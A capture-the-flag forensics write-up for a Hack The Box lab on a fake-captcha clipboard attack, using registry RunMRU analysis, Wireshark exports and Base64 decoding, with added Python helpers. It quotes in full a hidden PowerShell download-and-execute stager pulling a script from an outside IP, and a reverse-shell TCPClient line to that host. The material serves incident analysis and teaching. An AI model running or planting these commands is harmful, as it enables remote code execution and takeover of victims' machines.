---
title: 'Hack The Box — Pikaptcha Lab Writeup'
---
# Hack The Box — Pikaptcha Lab Writeup
**Overview of attack scenario:**

**Lab Files**: network traffic + endpoint artifacts
### Tools:
- Wireshark
- RegistryExplorer
**Task 1 && Task 2:**
**It is crucial to understand any payloads executed on the system for initial access. Analyzing registry hive for user happy grunwald. What is the full command that was run to download and execute the stager? At what time in UTC did the malicious payload execute?**
We open Registry Explorer and load the `NTUSER.DAT` hive for user Happy Grunwald into it, then navigate to `Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, the key that stores the history of commands entered in the Run dialog box (Windows+R). Each entry is a single-letter value whose data is the command followed by `\1`, and the `MRUList` value lists those letters most-recent first, so the command that downloaded and executed the stager is read straight from the entry at the head of that list. Registry Explorer also shows the key's last-write timestamp, which the registry stores in UTC; the key is rewritten every time a new Run entry is added, so when the stager is the most recent entry, that timestamp is the time the malicious payload was run, which answers Task 2.
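The same RunMRU reasoning in code, as an added example that is not part of the original writeup: it orders the entries by `MRUList`, strips the trailing `\1`, and converts the key's last-write FILETIME (100 ns ticks since 1601-01-01 UTC) to a UTC datetime. The sample values and the last-write time below are constructed for illustration and are not the lab's data; the optional loader assumes the `python-registry` package and is not exercised here.

```python
from datetime import datetime, timedelta, timezone

RUNMRU_PATH = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_utc(filetime: int) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware UTC datetime."""
    return EPOCH_1601 + timedelta(microseconds=filetime // 10)


def utc_to_filetime(dt: datetime) -> int:
    """Inverse of filetime_to_utc; used here only to build the constructed sample."""
    delta = dt - EPOCH_1601
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def ordered_runmru(values: dict) -> list:
    """values: {value_name: data} as read from the RunMRU key.
    Returns the commands most-recent first, with the '\\1' suffix removed."""
    commands = []
    for letter in values.get("MRUList", ""):
        data = values.get(letter)
        if data is None:
            continue  # MRUList can reference a letter whose value was deleted
        commands.append(data[:-2] if data.endswith("\\1") else data)
    return commands


def load_runmru(ntuser_path: str):
    """Read RunMRU from an NTUSER.DAT. Assumes the python-registry package
    (import name 'Registry'); this is an assumption, not exercised by the sample."""
    from Registry import Registry  # pip install python-registry
    key = Registry.Registry(ntuser_path).open(RUNMRU_PATH)
    values = {v.name(): v.value() for v in key.values()}
    return values, key.timestamp().replace(tzinfo=timezone.utc)


# Constructed sample RunMRU content (not the lab hive). The stager command itself
# is the one quoted in the writeup.
SAMPLE_VALUES = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": "powershell -NOP -NonI -W Hidden -Exec Bypass -Command "
         "\"IEX(New-Object Net.WebClient).DownloadString("
         "'http://43.205.115.44/office2024install.ps1')\"\\1",
}
# Constructed last-write time; the real value comes from the key in Registry Explorer.
SAMPLE_LASTWRITE = utc_to_filetime(datetime(2024, 9, 4, 8, 1, 2, tzinfo=timezone.utc))

if __name__ == "__main__":
    for i, cmd in enumerate(ordered_runmru(SAMPLE_VALUES)):
        print(f"{i}: {cmd}")
    print("key last written (UTC):", filetime_to_utc(SAMPLE_LASTWRITE).isoformat())
```

The last-write time belongs to the key, not to an individual value, so it only dates the most recent Run entry; if the user ran anything else through the dialog afterwards, the stager's own execution time would have to come from another artifact.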

**Task 3**:
**The payload which was executed initially downloaded a PowerShell script and executed it in memory. What is sha256 hash of the script?**
We open the PCAP file provided in the lab resources. From Task 1 we know the script name is `office2024install.ps1`, so we go to File > Export Objects > HTTP, search the object list for that filename and export it.

We then obtain its SHA-256 hash. Uploading the file to VirusTotal returns the hash, but it also shares the sample with a third party, so the better habit is to compute it locally with `sha256sum office2024install.ps1` or, on Windows, `Get-FileHash -Algorithm SHA256 office2024install.ps1`; either way the value is the same as the one VirusTotal shows.
The HTTP request for the script in the PCAP also gives us the victim's IP address: `172.17.79.129`.
**Task 4**:
**To which port did the reverse shell connect?**
Within `office2024install.ps1`, we find the following command:
```
powershell -e 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
```
The `-e` switch is short for `-EncodedCommand`, which takes the Base64 encoding of the script as UTF-16LE text, so to recover the original PowerShell code we decode it with [CyberChef](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)Decode_text('UTF-16LE%20(1200)')&input=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&ieol=CRLF&oeol=CRLF) using From Base64 followed by Decode Text (UTF-16LE).
After decoding it, we see that it creates a reverse shell, which connects to `43.205.115.44` on port `6969`.
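Tasks 3 and 4 in code, as an added example that is not part of the original writeup: it hashes the downloaded script, pulls the `-e`/`-EncodedCommand` argument out of it, decodes it as Base64 then UTF-16LE, and extracts the host and port from the `TCPClient(...)` call. Because the encoded blob is not reproduced on this page, the script body below is a constructed stand-in built from the IP and port the writeup reports; it is not the lab's script.

```python
import base64
import hashlib
import re

# PowerShell accepts several spellings of the switch; all take Base64 of UTF-16LE text.
ENCODED_ARG = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
TCPCLIENT = re.compile(r"TCPClient\s*\(\s*['\"]([^'\"]+)['\"]\s*,\s*(\d+)")


def sha256_hex(data: bytes) -> str:
    """Task 3: hash the exported script locally instead of uploading it."""
    return hashlib.sha256(data).hexdigest()


def decode_encoded_command(script_text: str):
    """Return the decoded PowerShell behind the first -e/-EncodedCommand argument,
    or None when the script carries no encoded command."""
    m = ENCODED_ARG.search(script_text)
    if not m:
        return None
    raw = base64.b64decode(m.group(1))
    # -EncodedCommand is defined as UTF-16LE; decoding as UTF-8 yields NUL-separated junk.
    return raw.decode("utf-16-le")


def find_tcp_target(powershell: str):
    """Task 4: (host, port) from New-Object System.Net.Sockets.TCPClient(host, port)."""
    m = TCPCLIENT.search(powershell)
    return (m.group(1), int(m.group(2))) if m else None


# Constructed stand-in for the decoded reverse-shell body (only the connect line
# matters here); the IP and port are the ones named in the writeup.
SAMPLE_DECODED = (
    "$client = New-Object System.Net.Sockets.TCPClient('43.205.115.44',6969);"
    "$stream = $client.GetStream()"
)
# Constructed stand-in for office2024install.ps1: the same "powershell -e <base64>"
# shape the writeup shows, with the blob produced from SAMPLE_DECODED.
SAMPLE_SCRIPT = "powershell -e " + base64.b64encode(SAMPLE_DECODED.encode("utf-16-le")).decode()

if __name__ == "__main__":
    print("sha256:", sha256_hex(SAMPLE_SCRIPT.encode()))
    decoded = decode_encoded_command(SAMPLE_SCRIPT)
    print("decoded:", decoded)
    print("reverse shell target:", find_tcp_target(decoded))
```

Run it against the real export with `decode_encoded_command(open("office2024install.ps1", encoding="utf-8", errors="replace").read())` and `sha256_hex(open("office2024install.ps1", "rb").read())`; the hash must be taken over the exact bytes Wireshark exported, so read the file in binary mode.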
**Task 5**:
**For how many seconds was the reverse shell connection established between C2 and the victim's workstation?**
Based on our analysis in the previous tasks, we know that:
1. The C2 IP address is `43.205.115.44`
2. The C2 port is `6969`
3. The victim IP address is `172.17.79.129`
We navigate to the Statistics menu in Wireshark, choose Conversations, open the TCP tab and look for the row between `172.17.79.129` and `43.205.115.44` with port `6969` (applying the display filter `ip.addr==43.205.115.44 && tcp.port==6969` and ticking "Limit to display filter" narrows the list to that row). Its Duration column is the time in seconds between the first and last packet of that conversation in the capture, which is the answer.

*<center> TCP conversation showing the reverse shell connection and its duration </center>*
**Task 6**:
**Attacker hosted a malicious Captcha to lure in users. What is the name of the function which contains the malicious payload to be pasted in victim's clipboard?**
From task 1, we know that the malicious payload to be pasted into the victim's clipboard is:
```
powershell -NOP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://43.205.115.44/office2024install.ps1')"
```
We search the capture for this payload, either with the display filter `frame contains "office2024install.ps1"` or via Edit > Find Packet with "String" selected and "Packet bytes" as the search target, which lands on the HTTP response that served the fake captcha page. Following the HTTP stream of that packet (right-click > Follow > HTTP Stream) shows the page's JavaScript, where the payload sits inside the function that writes it to the clipboard; that function's name is the answer.
